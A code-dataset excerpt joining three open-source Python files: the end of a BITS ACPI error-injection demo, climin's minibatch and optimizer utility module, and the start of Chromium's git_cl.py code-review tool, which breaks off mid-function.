raise RuntimeError("No ACPI EINJ table found")
print(einj)
def demo():
unc_methods = [
inject_memory_unc_nonfatal_err,
inject_memory_unc_fatal_err,
inject_processor_unc_nonfatal_err,
inject_processor_unc_fatal_err,
inject_pcie_unc_nonfatal_err,
inject_pcie_unc_fatal_err,
inject_platform_unc_nonfatal_err,
inject_platform_unc_fatal_err,
]
corr_methods = [
inject_memory_correctable_err,
inject_processor_correctable_err,
inject_pcie_correctable_err,
inject_platform_correctable_err,
]
display_methods = [
display_einj,
display_einj_address,
display_supported_errors,
display_triggers,
display_vendor_error_type_extension,
]
with ttypager.page():
for item in display_methods:
print("\n\n\nMethod name: {}".format(item.__name__))
print("Method doc:\n{}\n\n".format(item.__doc__ if item.__doc__ else "No documentation for this method"))
item()
for item in corr_methods:
print("\n\nMethod name: {}".format(item.__name__))
print("Method doc: {}".format(item.__doc__ if item.__doc__ else "No documentation for this method"))
item()
for item in unc_methods:
print("\n\n\nMethod name: {}".format(item.__name__))
print("Method doc: {}\n\n".format(item.__doc__ if item.__doc__ else "No documentation for this method"))
print("Based on the name and documentation of this item, it is likely to be fatal.")
print("Execute it directly from the python command line.")
print("Your mileage may vary and if it breaks, you get to keep all the pieces.")
|
ii0/bits
|
python/einj.py
|
Python
|
bsd-3-clause
| 23,447
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import inspect
import itertools
import random
import warnings
import numpy as np
from .gd import GradientDescent
from .bfgs import Lbfgs
from .cg import NonlinearConjugateGradient
from .rprop import Rprop
from .rmsprop import RmsProp
from .adadelta import Adadelta
from .adam import Adam
from .radagrad import Radagrad
from .adagrad import Adagrad
from .adagrad_full import AdagradFull
try:
from sklearn.grid_search import ParameterSampler
except ImportError:
pass
def is_garray(cand):
return hasattr(cand, 'as_numpy_array')
def is_array(cand):
return is_garray(cand) or isinstance(cand, np.ndarray)
def clear_info(info):
"""Clean up contents of info dictionary for better use.
Keys to be removed are ``args``, ``kwargs`` and any non-scalar numpy or
gnumpy arrays. Numpy scalars are converted to floats.
Examples
--------
>>> import numpy as np
>>> info = {'args': None, 'foo': np.zeros(3), 'bar': np.array(1),
... 'loss': 1.}
>>> cleared = clear_info(info)
>>> cleared == {'bar': 1.0, 'loss': 1.0}
True
"""
items = info.iteritems()
items = ((k, float(v.reshape((1,))[0]) if is_array(v) and v.size == 1 else v)
for k, v in items)
items = ((k, v) for k, v in items if not is_array(v))
items = ((k, v) for k, v in items if k not in ('args', 'kwargs'))
return dict(items)
def coroutine(f):
"""Turn a generator function into a coroutine by calling .next() once."""
def started(*args, **kwargs):
cr = f(*args, **kwargs)
next(cr)
return cr
return started
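# Usage sketch for the decorator above; _example_printer is illustrative and
# not used elsewhere in this module. Because @coroutine advances the generator
# to its first yield, .send() works without a priming next() call.
@coroutine
def _example_printer():
    while True:
        item = (yield)
        print(item)
# e.g.:
#   p = _example_printer()
#   p.send('hello')    # -> prints 'hello'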
def aslist(item):
if not isinstance(item, (list, tuple)):
item = [item]
return item
def mini_slices(n_samples, batch_size):
"""Yield slices of size `batch_size` that work with a container of length
`n_samples`."""
n_batches, rest = divmod(n_samples, batch_size)
if rest != 0:
n_batches += 1
return [slice(i * batch_size, (i + 1) * batch_size) for i in range(n_batches)]
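# Worked example for mini_slices (numbers assumed): mini_slices(10, 4) returns
# [slice(0, 4), slice(4, 8), slice(8, 12)]; the last slice may run past
# n_samples, which is harmless because slicing simply stops at the end.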
def draw_mini_slices(n_samples, batch_size, with_replacement=False):
slices = mini_slices(n_samples, batch_size)
idxs = range(len(slices))
    if with_replacement:
        while True:
            yield random.choice(slices)
else:
while True:
random.shuffle(idxs)
for i in idxs:
yield slices[i]
def draw_mini_indices(n_samples, batch_size):
assert n_samples > batch_size
idxs = range(n_samples)
random.shuffle(idxs)
pos = 0
while True:
while pos + batch_size <= n_samples:
yield idxs[pos:pos + batch_size]
pos += batch_size
batch = idxs[pos:]
needed = batch_size - len(batch)
random.shuffle(idxs)
batch += idxs[0:needed]
yield batch
pos = needed
def optimizer(identifier, wrt, *args, **kwargs):
"""Return an optimizer with the desired configuration.
This is a convenience function if one wants to try out different optimizers
but wants to change as little code as possible.
Additional arguments and keyword arguments will be passed to the constructor
of the class. If the found class does not take the arguments supplied, this
will `not` throw an error, but pass silently.
    :param identifier: String identifying the optimizer to use. Can be either
        ``gd``, ``lbfgs``, ``ncg``, ``rprop``, ``rmsprop``, ``adadelta``,
        ``adam``, ``adagrad``, ``adagrad-full`` or ``radagrad``.
:param wrt: Numpy array pointing to the data to optimize.
"""
klass_map = {
'gd': GradientDescent,
'lbfgs': Lbfgs,
'ncg': NonlinearConjugateGradient,
'rprop': Rprop,
'rmsprop': RmsProp,
'adadelta': Adadelta,
'adam': Adam,
'radagrad': Radagrad,
'adagrad-full': AdagradFull,
'adagrad': Adagrad,
}
# Find out which arguments to pass on.
klass = klass_map[identifier]
argspec = inspect.getargspec(klass.__init__)
if argspec.keywords is None:
# Issue a warning for each of the arguments that have been passed
# to this optimizer but were not used.
expected_keys = set(argspec.args)
given_keys = set(kwargs.keys())
unused_keys = given_keys - expected_keys
for i in unused_keys:
warnings.warn('Argument named %s is not expected by %s'
% (i, klass))
# We need to filter stuff out.
used_keys = expected_keys & given_keys
kwargs = dict((k, kwargs[k]) for k in used_keys)
try:
opt = klass(wrt, *args, **kwargs)
except TypeError:
raise TypeError('required arguments for %s: %s' % (klass, argspec.args))
return opt
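# Hedged usage sketch for optimizer(); my_gradient is a hypothetical callable
# returning the gradient at wrt, and the keyword names are assumed to match
# climin's GradientDescent signature.
#   wrt = np.zeros(10)
#   opt = optimizer('gd', wrt, fprime=my_gradient, step_rate=0.1)
#   for info in opt:
#       if info['n_iter'] >= 100:
#           break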
def shaped_from_flat(flat, shapes):
"""Given a one dimensional array ``flat``, return a list of views of shapes
``shapes`` on that array.
Each view will point to a distinct memory region, consecutively allocated
in flat.
Parameters
----------
flat : array_like
Array of one dimension.
shapes : list of tuples of ints
Each entry of this list specifies the shape of the corresponding view
into ``flat``.
Returns
-------
views : list of arrays
Each entry has the shape given in ``shapes`` and points as a view into
``flat``.
"""
shapes = [(i,) if isinstance(i, int) else i for i in shapes]
sizes = [np.prod(i) for i in shapes]
n_used = 0
views = []
for size, shape in zip(sizes, shapes):
this = flat[n_used:n_used + size]
n_used += size
this.shape = shape
views.append(this)
return views
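# Worked example (values assumed): carve an 8-element array into a (3, 2)
# matrix followed by a length-2 vector, both sharing flat's memory.
#   flat = np.arange(8.0)
#   w, b = shaped_from_flat(flat, [(3, 2), 2])
#   w.shape == (3, 2) and b.shape == (2,)
#   flat[0] = -1       # also visible as w[0, 0] == -1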
def empty_with_views(shapes, empty_func=np.empty):
"""Create an array and views shaped according to ``shapes``.
The ``shapes`` parameter is a list of tuples of ints. Each tuple
represents a desired shape for an array which will be allocated in a bigger
memory region. This memory region will be represented by an array as well.
    For example, the shape specification ``[2, (3, 2)]`` will create an array
    ``flat`` of size 8. The first view will have a size of ``(2,)`` and point
    to the first two entries, i.e. ``flat[:2]``, while the second array will
have a shape of ``(3, 2)`` and point to the elements ``flat[2:8]``.
Parameters
----------
spec : list of tuples of ints
Specification of the desired shapes.
empty_func : callable
function that returns a memory region given an integer of the desired
size. (Examples include ``numpy.empty``, which is the default,
        ``gnumpy.empty`` and ``theano.tensor.empty``.)
Returns
-------
flat : array_like (depending on ``empty_func``)
Memory region containing all the views.
views : list of array_like
Variable number of results. Each contains a view into the array
``flat``.
Examples
--------
>>> from climin.util import empty_with_views
>>> flat, (w, b) = empty_with_views([(3, 2), 2])
>>> w[...] = 1
>>> b[...] = 2
>>> flat
array([ 1., 1., 1., 1., 1., 1., 2., 2.])
>>> flat[0] = 3
>>> w
array([[ 3., 1.],
[ 1., 1.],
[ 1., 1.]])
"""
shapes = [(i,) if isinstance(i, int) else i for i in shapes]
sizes = [np.prod(i) for i in shapes]
n_pars = sum(sizes)
flat = empty_func(n_pars)
views = shaped_from_flat(flat, shapes)
return flat, views
def minibatches(arr, batch_size, d=0):
"""Return a list of views of the given arr.
    Each view represents a mini batch of the data.
Parameters
----------
arr : array_like
Array to obtain batches from. Needs to be slicable. If ``d > 0``, needs
to have a ``.shape`` attribute from which the number of samples can
be obtained.
batch_size : int
Size of a batch. Last batch might be smaller if ``batch_size`` is not a
divisor of ``arr``.
d : int, optional, default: 0
Dimension along which the data samples are separated and thus slicing
should be done.
Returns
-------
mini_batches : list
Each item of the list is a view of ``arr``. Views are ordered.
"""
    # Use len() here so this also works with plain lists when d == 0.
if d == 0:
n_batches, rest = divmod(len(arr), batch_size)
else:
n_batches, rest = divmod(arr.shape[d], batch_size)
if rest:
n_batches += 1
slices = (slice(i * batch_size, (i + 1) * batch_size)
for i in range(n_batches))
if d == 0:
res = [arr[i] for i in slices]
elif d == 1:
res = [arr[:, i] for i in slices]
elif d == 2:
res = [arr[:, :, i] for i in slices]
    else:
        raise ValueError("minibatches only supports d in (0, 1, 2)")
    return res
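# Worked example (array assumed): splitting 5 samples into batches of 2 along
# axis 0 yields three views with 2, 2 and 1 rows respectively.
#   arr = np.arange(10).reshape(5, 2)
#   [b.shape[0] for b in minibatches(arr, 2)] == [2, 2, 1]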
def iter_minibatches(lst, batch_size, dims, n_cycles=False, random_state=None):
"""Return an iterator that successively yields tuples containing aligned
minibatches of size `batch_size` from slicable objects given in `lst`, in
random order without replacement.
Because different containers might require slicing over different
    dimensions, the dimension of each container has to be given as a list
`dims`.
Parameters
----------
lst : list of array_like
        Each item of the list will be sliced into mini batches in alignment with
the others.
batch_size : int
Size of each batch. Last batch might be smaller.
dims : list
Aligned with ``lst``, gives the dimension along which the data samples
are separated.
n_cycles : int or False, optional [default: False]
Number of cycles after which to stop the iterator. If ``False``, will
yield forever.
random_state : a numpy.random.RandomState object, optional [default : None]
Random number generator that will act as a seed for the minibatch order
Returns
-------
batches : iterator
Infinite iterator of mini batches in random order (without
replacement).
"""
batches = [minibatches(i, batch_size, d) for i, d in zip(lst, dims)]
if len(batches) > 1:
if any(len(i) != len(batches[0]) for i in batches[1:]):
raise ValueError("containers to be batched have different lengths")
counter = itertools.count()
if random_state is not None:
random.seed(random_state.normal())
while True:
indices = [i for i, _ in enumerate(batches[0])]
while True:
random.shuffle(indices)
for i in indices:
yield tuple(b[i] for b in batches)
count = next(counter)
if n_cycles and count >= n_cycles:
raise StopIteration()
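# Usage sketch for iter_minibatches (arrays assumed): X and Z both hold
# samples along axis 0, so dims is [0, 0]; every yielded tuple contains
# aligned views of both containers.
#   X, Z = np.empty((100, 5)), np.empty((100, 1))
#   batches = iter_minibatches([X, Z], 10, [0, 0])
#   x_batch, z_batch = next(batches)    # both have 10 rows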
class OptimizerDistribution(object):
"""OptimizerDistribution class.
Can be used for specifying optimizers in scikit-learn's randomized parameter
search.
Attributes
----------
options : dict
Maps an optimizer key to a grid to sample from.
"""
def __init__(self, **options):
"""Create an OptimizerDistribution object.
Parameters
----------
options : dict
Maps an optimizer key to a grid to sample from.
"""
self.options = options
def rvs(self):
opt = random.choice(list(self.options.keys()))
grid = self.options[opt]
sample = list(ParameterSampler(grid, n_iter=1))[0]
return opt, sample
|
gabobert/climin
|
climin/util.py
|
Python
|
bsd-3-clause
| 11,486
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Copyright (C) 2008 Evan Martin <martine@danga.com>
"""A git-command for integrating reviews on Rietveld."""
from distutils.version import LooseVersion
import base64
import glob
import json
import logging
import optparse
import os
import Queue
import re
import stat
import sys
import textwrap
import threading
import urllib2
import urlparse
import webbrowser
import zlib
try:
import readline # pylint: disable=F0401,W0611
except ImportError:
pass
from third_party import colorama
from third_party import upload
import breakpad # pylint: disable=W0611
import clang_format
import fix_encoding
import gclient_utils
import git_common
import owners
import owners_finder
import presubmit_support
import rietveld
import scm
import subcommand
import subprocess2
import watchlists
__version__ = '1.0'
DEFAULT_SERVER = 'https://codereview.appspot.com'
POSTUPSTREAM_HOOK_PATTERN = '.git/hooks/post-cl-%s'
DESCRIPTION_BACKUP_FILE = '~/.git_cl_description_backup'
GIT_INSTRUCTIONS_URL = 'http://code.google.com/p/chromium/wiki/UsingGit'
CHANGE_ID = 'Change-Id:'
# Valid extensions for files we want to lint.
DEFAULT_LINT_REGEX = r"(.*\.cpp|.*\.cc|.*\.h)"
DEFAULT_LINT_IGNORE_REGEX = r"$^"
# Shortcut since it quickly becomes redundant.
Fore = colorama.Fore
# Initialized in main()
settings = None
def DieWithError(message):
print >> sys.stderr, message
sys.exit(1)
def GetNoGitPagerEnv():
env = os.environ.copy()
# 'cat' is a magical git string that disables pagers on all platforms.
env['GIT_PAGER'] = 'cat'
return env
def RunCommand(args, error_ok=False, error_message=None, **kwargs):
try:
return subprocess2.check_output(args, shell=False, **kwargs)
except subprocess2.CalledProcessError as e:
logging.debug('Failed running %s', args)
if not error_ok:
DieWithError(
'Command "%s" failed.\n%s' % (
' '.join(args), error_message or e.stdout or ''))
return e.stdout
def RunGit(args, **kwargs):
"""Returns stdout."""
return RunCommand(['git'] + args, **kwargs)
def RunGitWithCode(args, suppress_stderr=False):
"""Returns return code and stdout."""
try:
if suppress_stderr:
stderr = subprocess2.VOID
else:
stderr = sys.stderr
out, code = subprocess2.communicate(['git'] + args,
env=GetNoGitPagerEnv(),
stdout=subprocess2.PIPE,
stderr=stderr)
return code, out[0]
except ValueError:
# When the subprocess fails, it returns None. That triggers a ValueError
# when trying to unpack the return value into (out, code).
return 1, ''
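# Usage sketch (command and output assumed): unlike RunGit, RunGitWithCode
# never dies on a non-zero exit code, so callers can branch on the code:
#   code, out = RunGitWithCode(['config', '--get', 'user.email'])
#   if code == 0:
#     email = out.strip()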
def IsGitVersionAtLeast(min_version):
prefix = 'git version '
version = RunGit(['--version']).strip()
return (version.startswith(prefix) and
LooseVersion(version[len(prefix):]) >= LooseVersion(min_version))
def ask_for_data(prompt):
try:
return raw_input(prompt)
except KeyboardInterrupt:
# Hide the exception.
sys.exit(1)
def git_set_branch_value(key, value):
branch = Changelist().GetBranch()
if not branch:
return
cmd = ['config']
if isinstance(value, int):
cmd.append('--int')
git_key = 'branch.%s.%s' % (branch, key)
RunGit(cmd + [git_key, str(value)])
def git_get_branch_default(key, default):
branch = Changelist().GetBranch()
if branch:
git_key = 'branch.%s.%s' % (branch, key)
(_, stdout) = RunGitWithCode(['config', '--int', '--get', git_key])
try:
return int(stdout.strip())
except ValueError:
pass
return default
def add_git_similarity(parser):
parser.add_option(
'--similarity', metavar='SIM', type='int', action='store',
help='Sets the percentage that a pair of files need to match in order to'
' be considered copies (default 50)')
parser.add_option(
'--find-copies', action='store_true',
help='Allows git to look for copies.')
parser.add_option(
'--no-find-copies', action='store_false', dest='find_copies',
help='Disallows git from looking for copies.')
old_parser_args = parser.parse_args
def Parse(args):
options, args = old_parser_args(args)
if options.similarity is None:
options.similarity = git_get_branch_default('git-cl-similarity', 50)
else:
print('Note: Saving similarity of %d%% in git config.'
% options.similarity)
git_set_branch_value('git-cl-similarity', options.similarity)
options.similarity = max(0, min(options.similarity, 100))
if options.find_copies is None:
options.find_copies = bool(
git_get_branch_default('git-find-copies', True))
else:
git_set_branch_value('git-find-copies', int(options.find_copies))
print('Using %d%% similarity for rename/copy detection. '
'Override with --similarity.' % options.similarity)
return options, args
parser.parse_args = Parse
def is_dirty_git_tree(cmd):
# Make sure index is up-to-date before running diff-index.
RunGit(['update-index', '--refresh', '-q'], error_ok=True)
dirty = RunGit(['diff-index', '--name-status', 'HEAD'])
if dirty:
print 'Cannot %s with a dirty tree. You must commit locally first.' % cmd
print 'Uncommitted files: (git diff-index --name-status HEAD)'
print dirty[:4096]
if len(dirty) > 4096:
print '... (run "git diff-index --name-status HEAD" to see full output).'
return True
return False
def MatchSvnGlob(url, base_url, glob_spec, allow_wildcards):
"""Return the corresponding git ref if |base_url| together with |glob_spec|
matches the full |url|.
If |allow_wildcards| is true, |glob_spec| can contain wildcards (see below).
"""
fetch_suburl, as_ref = glob_spec.split(':')
if allow_wildcards:
glob_match = re.match('(.+/)?(\*|{[^/]*})(/.+)?', fetch_suburl)
if glob_match:
# Parse specs like "branches/*/src:refs/remotes/svn/*" or
# "branches/{472,597,648}/src:refs/remotes/svn/*".
branch_re = re.escape(base_url)
if glob_match.group(1):
branch_re += '/' + re.escape(glob_match.group(1))
wildcard = glob_match.group(2)
if wildcard == '*':
branch_re += '([^/]*)'
else:
# Escape and replace surrounding braces with parentheses and commas
# with pipe symbols.
wildcard = re.escape(wildcard)
wildcard = re.sub('^\\\\{', '(', wildcard)
wildcard = re.sub('\\\\,', '|', wildcard)
wildcard = re.sub('\\\\}$', ')', wildcard)
branch_re += wildcard
if glob_match.group(3):
branch_re += re.escape(glob_match.group(3))
match = re.match(branch_re, url)
if match:
return re.sub('\*$', match.group(1), as_ref)
# Parse specs like "trunk/src:refs/remotes/origin/trunk".
if fetch_suburl:
full_url = base_url + '/' + fetch_suburl
else:
full_url = base_url
if full_url == url:
return as_ref
return None
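# Worked examples (URLs assumed, not taken from any real checkout):
#   MatchSvnGlob('svn://svn.chromium.org/chrome/trunk/src',
#                'svn://svn.chromium.org/chrome',
#                'trunk/src:refs/remotes/origin/trunk', False)
#   returns 'refs/remotes/origin/trunk'.
# With allow_wildcards=True, a spec like 'branches/*/src:refs/remotes/svn/*'
# maps .../chrome/branches/foo/src to 'refs/remotes/svn/foo'.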
def print_stats(similarity, find_copies, args):
"""Prints statistics about the change to the user."""
# --no-ext-diff is broken in some versions of Git, so try to work around
# this by overriding the environment (but there is still a problem if the
# git config key "diff.external" is used).
env = GetNoGitPagerEnv()
if 'GIT_EXTERNAL_DIFF' in env:
del env['GIT_EXTERNAL_DIFF']
if find_copies:
similarity_options = ['--find-copies-harder', '-l100000',
'-C%s' % similarity]
else:
similarity_options = ['-M%s' % similarity]
try:
stdout = sys.stdout.fileno()
except AttributeError:
stdout = None
return subprocess2.call(
['git',
'diff', '--no-ext-diff', '--stat'] + similarity_options + args,
stdout=stdout, env=env)
class Settings(object):
def __init__(self):
self.default_server = None
self.cc = None
self.root = None
self.is_git_svn = None
self.svn_branch = None
self.tree_status_url = None
self.viewvc_url = None
self.updated = False
self.is_gerrit = None
self.git_editor = None
self.project = None
self.force_https_commit_url = None
self.pending_ref_prefix = None
def LazyUpdateIfNeeded(self):
"""Updates the settings from a codereview.settings file, if available."""
if not self.updated:
# The only value that actually changes the behavior is
# autoupdate = "false". Everything else means "true".
autoupdate = RunGit(['config', 'rietveld.autoupdate'],
error_ok=True
).strip().lower()
cr_settings_file = FindCodereviewSettingsFile()
if autoupdate != 'false' and cr_settings_file:
LoadCodereviewSettingsFromFile(cr_settings_file)
# set updated to True to avoid infinite calling loop
# through DownloadHooks
self.updated = True
DownloadHooks(False)
self.updated = True
def GetDefaultServerUrl(self, error_ok=False):
if not self.default_server:
self.LazyUpdateIfNeeded()
self.default_server = gclient_utils.UpgradeToHttps(
self._GetRietveldConfig('server', error_ok=True))
if error_ok:
return self.default_server
if not self.default_server:
error_message = ('Could not find settings file. You must configure '
'your review setup by running "git cl config".')
self.default_server = gclient_utils.UpgradeToHttps(
self._GetRietveldConfig('server', error_message=error_message))
return self.default_server
@staticmethod
def GetRelativeRoot():
return RunGit(['rev-parse', '--show-cdup']).strip()
def GetRoot(self):
if self.root is None:
self.root = os.path.abspath(self.GetRelativeRoot())
return self.root
def GetIsGitSvn(self):
"""Return true if this repo looks like it's using git-svn."""
if self.is_git_svn is None:
if self.GetPendingRefPrefix():
# If PENDING_REF_PREFIX is set then it's a pure git repo no matter what.
self.is_git_svn = False
else:
# If you have any "svn-remote.*" config keys, we think you're using svn.
self.is_git_svn = RunGitWithCode(
['config', '--local', '--get-regexp', r'^svn-remote\.'])[0] == 0
return self.is_git_svn
def GetSVNBranch(self):
if self.svn_branch is None:
if not self.GetIsGitSvn():
DieWithError('Repo doesn\'t appear to be a git-svn repo.')
# Try to figure out which remote branch we're based on.
# Strategy:
# 1) iterate through our branch history and find the svn URL.
# 2) find the svn-remote that fetches from the URL.
# regexp matching the git-svn line that contains the URL.
git_svn_re = re.compile(r'^\s*git-svn-id: (\S+)@', re.MULTILINE)
# We don't want to go through all of history, so read a line from the
# pipe at a time.
# The -100 is an arbitrary limit so we don't search forever.
cmd = ['git', 'log', '-100', '--pretty=medium']
proc = subprocess2.Popen(cmd, stdout=subprocess2.PIPE,
env=GetNoGitPagerEnv())
url = None
for line in proc.stdout:
match = git_svn_re.match(line)
if match:
url = match.group(1)
proc.stdout.close() # Cut pipe.
break
if url:
svn_remote_re = re.compile(r'^svn-remote\.([^.]+)\.url (.*)$')
remotes = RunGit(['config', '--get-regexp',
r'^svn-remote\..*\.url']).splitlines()
for remote in remotes:
match = svn_remote_re.match(remote)
if match:
remote = match.group(1)
base_url = match.group(2)
rewrite_root = RunGit(
['config', 'svn-remote.%s.rewriteRoot' % remote],
error_ok=True).strip()
if rewrite_root:
base_url = rewrite_root
fetch_spec = RunGit(
['config', 'svn-remote.%s.fetch' % remote],
error_ok=True).strip()
if fetch_spec:
self.svn_branch = MatchSvnGlob(url, base_url, fetch_spec, False)
if self.svn_branch:
break
branch_spec = RunGit(
['config', 'svn-remote.%s.branches' % remote],
error_ok=True).strip()
if branch_spec:
self.svn_branch = MatchSvnGlob(url, base_url, branch_spec, True)
if self.svn_branch:
break
tag_spec = RunGit(
['config', 'svn-remote.%s.tags' % remote],
error_ok=True).strip()
if tag_spec:
self.svn_branch = MatchSvnGlob(url, base_url, tag_spec, True)
if self.svn_branch:
break
if not self.svn_branch:
DieWithError('Can\'t guess svn branch -- try specifying it on the '
'command line')
return self.svn_branch
def GetTreeStatusUrl(self, error_ok=False):
if not self.tree_status_url:
error_message = ('You must configure your tree status URL by running '
'"git cl config".')
self.tree_status_url = self._GetRietveldConfig(
'tree-status-url', error_ok=error_ok, error_message=error_message)
return self.tree_status_url
def GetViewVCUrl(self):
if not self.viewvc_url:
self.viewvc_url = self._GetRietveldConfig('viewvc-url', error_ok=True)
return self.viewvc_url
def GetBugPrefix(self):
return self._GetRietveldConfig('bug-prefix', error_ok=True)
def GetDefaultCCList(self):
return self._GetRietveldConfig('cc', error_ok=True)
def GetDefaultPrivateFlag(self):
return self._GetRietveldConfig('private', error_ok=True)
def GetIsGerrit(self):
"""Return true if this repo is assosiated with gerrit code review system."""
if self.is_gerrit is None:
self.is_gerrit = self._GetConfig('gerrit.host', error_ok=True)
return self.is_gerrit
def GetGitEditor(self):
"""Return the editor specified in the git config, or None if none is."""
if self.git_editor is None:
self.git_editor = self._GetConfig('core.editor', error_ok=True)
return self.git_editor or None
def GetLintRegex(self):
return (self._GetRietveldConfig('cpplint-regex', error_ok=True) or
DEFAULT_LINT_REGEX)
def GetLintIgnoreRegex(self):
return (self._GetRietveldConfig('cpplint-ignore-regex', error_ok=True) or
DEFAULT_LINT_IGNORE_REGEX)
def GetProject(self):
if not self.project:
self.project = self._GetRietveldConfig('project', error_ok=True)
return self.project
def GetForceHttpsCommitUrl(self):
if not self.force_https_commit_url:
self.force_https_commit_url = self._GetRietveldConfig(
'force-https-commit-url', error_ok=True)
return self.force_https_commit_url
def GetPendingRefPrefix(self):
if not self.pending_ref_prefix:
self.pending_ref_prefix = self._GetRietveldConfig(
'pending-ref-prefix', error_ok=True)
return self.pending_ref_prefix
def _GetRietveldConfig(self, param, **kwargs):
return self._GetConfig('rietveld.' + param, **kwargs)
def _GetConfig(self, param, **kwargs):
self.LazyUpdateIfNeeded()
return RunGit(['config', param], **kwargs).strip()
def ShortBranchName(branch):
"""Convert a name like 'refs/heads/foo' to just 'foo'."""
return branch.replace('refs/heads/', '')
class Changelist(object):
def __init__(self, branchref=None, issue=None):
# Poke settings so we get the "configure your server" message if necessary.
global settings
if not settings:
# Happens when git_cl.py is used as a utility library.
settings = Settings()
settings.GetDefaultServerUrl()
self.branchref = branchref
if self.branchref:
self.branch = ShortBranchName(self.branchref)
else:
self.branch = None
self.rietveld_server = None
self.upstream_branch = None
self.lookedup_issue = False
self.issue = issue or None
self.has_description = False
self.description = None
self.lookedup_patchset = False
self.patchset = None
self._rpc_server = None
self.cc = None
self.watchers = ()
self._remote = None
self._props = None
def GetCCList(self):
"""Return the users cc'd on this CL.
Return is a string suitable for passing to gcl with the --cc flag.
"""
if self.cc is None:
base_cc = settings.GetDefaultCCList()
more_cc = ','.join(self.watchers)
self.cc = ','.join(filter(None, (base_cc, more_cc))) or ''
return self.cc
def GetCCListWithoutDefault(self):
"""Return the users cc'd on this CL excluding default ones."""
if self.cc is None:
self.cc = ','.join(self.watchers)
return self.cc
def SetWatchers(self, watchers):
"""Set the list of email addresses that should be cc'd based on the changed
files in this CL.
"""
self.watchers = watchers
def GetBranch(self):
"""Returns the short branch name, e.g. 'master'."""
if not self.branch:
branchref = RunGit(['symbolic-ref', 'HEAD'],
stderr=subprocess2.VOID, error_ok=True).strip()
if not branchref:
return None
self.branchref = branchref
self.branch = ShortBranchName(self.branchref)
return self.branch
def GetBranchRef(self):
"""Returns the full branch name, e.g. 'refs/heads/master'."""
self.GetBranch() # Poke the lazy loader.
return self.branchref
@staticmethod
def FetchUpstreamTuple(branch):
"""Returns a tuple containing remote and remote ref,
e.g. 'origin', 'refs/heads/master'
"""
remote = '.'
upstream_branch = RunGit(['config', 'branch.%s.merge' % branch],
error_ok=True).strip()
if upstream_branch:
remote = RunGit(['config', 'branch.%s.remote' % branch]).strip()
else:
upstream_branch = RunGit(['config', 'rietveld.upstream-branch'],
error_ok=True).strip()
if upstream_branch:
remote = RunGit(['config', 'rietveld.upstream-remote']).strip()
else:
# Fall back on trying a git-svn upstream branch.
if settings.GetIsGitSvn():
upstream_branch = settings.GetSVNBranch()
else:
# Else, try to guess the origin remote.
remote_branches = RunGit(['branch', '-r']).split()
if 'origin/master' in remote_branches:
            # Fall back on origin/master if it exists.
remote = 'origin'
upstream_branch = 'refs/heads/master'
elif 'origin/trunk' in remote_branches:
# Fall back on origin/trunk if it exists. Generally a shared
# git-svn clone
remote = 'origin'
upstream_branch = 'refs/heads/trunk'
else:
DieWithError("""Unable to determine default branch to diff against.
Either pass complete "git diff"-style arguments, like
git cl upload origin/master
or verify this branch is set up to track another (via the --track argument to
"git checkout -b ...").""")
return remote, upstream_branch
def GetCommonAncestorWithUpstream(self):
return git_common.get_or_create_merge_base(self.GetBranch(),
self.GetUpstreamBranch())
def GetUpstreamBranch(self):
if self.upstream_branch is None:
remote, upstream_branch = self.FetchUpstreamTuple(self.GetBranch())
      if remote != '.':
upstream_branch = upstream_branch.replace('refs/heads/',
'refs/remotes/%s/' % remote)
upstream_branch = upstream_branch.replace('refs/branch-heads/',
'refs/remotes/branch-heads/')
self.upstream_branch = upstream_branch
return self.upstream_branch
def GetRemoteBranch(self):
if not self._remote:
remote, branch = None, self.GetBranch()
seen_branches = set()
while branch not in seen_branches:
seen_branches.add(branch)
remote, branch = self.FetchUpstreamTuple(branch)
branch = ShortBranchName(branch)
if remote != '.' or branch.startswith('refs/remotes'):
break
else:
remotes = RunGit(['remote'], error_ok=True).split()
if len(remotes) == 1:
remote, = remotes
elif 'origin' in remotes:
remote = 'origin'
logging.warning('Could not determine which remote this change is '
'associated with, so defaulting to "%s". This may '
'not be what you want. You may prevent this message '
'by running "git svn info" as documented here: %s',
                          remote,
GIT_INSTRUCTIONS_URL)
else:
logging.warn('Could not determine which remote this change is '
'associated with. You may prevent this message by '
'running "git svn info" as documented here: %s',
GIT_INSTRUCTIONS_URL)
branch = 'HEAD'
if branch.startswith('refs/remotes'):
self._remote = (remote, branch)
elif branch.startswith('refs/branch-heads/'):
self._remote = (remote, branch.replace('refs/', 'refs/remotes/'))
else:
self._remote = (remote, 'refs/remotes/%s/%s' % (remote, branch))
return self._remote
def GitSanityChecks(self, upstream_git_obj):
"""Checks git repo status and ensures diff is from local commits."""
if upstream_git_obj is None:
if self.GetBranch() is None:
print >> sys.stderr, (
            'ERROR: unable to determine current branch (detached HEAD?)')
else:
print >> sys.stderr, (
'ERROR: no upstream branch')
return False
# Verify the commit we're diffing against is in our current branch.
upstream_sha = RunGit(['rev-parse', '--verify', upstream_git_obj]).strip()
common_ancestor = RunGit(['merge-base', upstream_sha, 'HEAD']).strip()
if upstream_sha != common_ancestor:
print >> sys.stderr, (
'ERROR: %s is not in the current branch. You may need to rebase '
'your tracking branch' % upstream_sha)
return False
# List the commits inside the diff, and verify they are all local.
commits_in_diff = RunGit(
['rev-list', '^%s' % upstream_sha, 'HEAD']).splitlines()
code, remote_branch = RunGitWithCode(['config', 'gitcl.remotebranch'])
remote_branch = remote_branch.strip()
if code != 0:
_, remote_branch = self.GetRemoteBranch()
commits_in_remote = RunGit(
['rev-list', '^%s' % upstream_sha, remote_branch]).splitlines()
common_commits = set(commits_in_diff) & set(commits_in_remote)
if common_commits:
print >> sys.stderr, (
'ERROR: Your diff contains %d commits already in %s.\n'
'Run "git log --oneline %s..HEAD" to get a list of commits in '
'the diff. If you are using a custom git flow, you can override'
' the reference used for this check with "git config '
'gitcl.remotebranch <git-ref>".' % (
len(common_commits), remote_branch, upstream_git_obj))
return False
return True
def GetGitBaseUrlFromConfig(self):
"""Return the configured base URL from branch.<branchname>.baseurl.
Returns None if it is not set.
"""
return RunGit(['config', 'branch.%s.base-url' % self.GetBranch()],
error_ok=True).strip()
def GetGitSvnRemoteUrl(self):
"""Return the configured git-svn remote URL parsed from git svn info.
Returns None if it is not set.
"""
# URL is dependent on the current directory.
data = RunGit(['svn', 'info'], cwd=settings.GetRoot())
if data:
keys = dict(line.split(': ', 1) for line in data.splitlines()
if ': ' in line)
return keys.get('URL', None)
return None
def GetRemoteUrl(self):
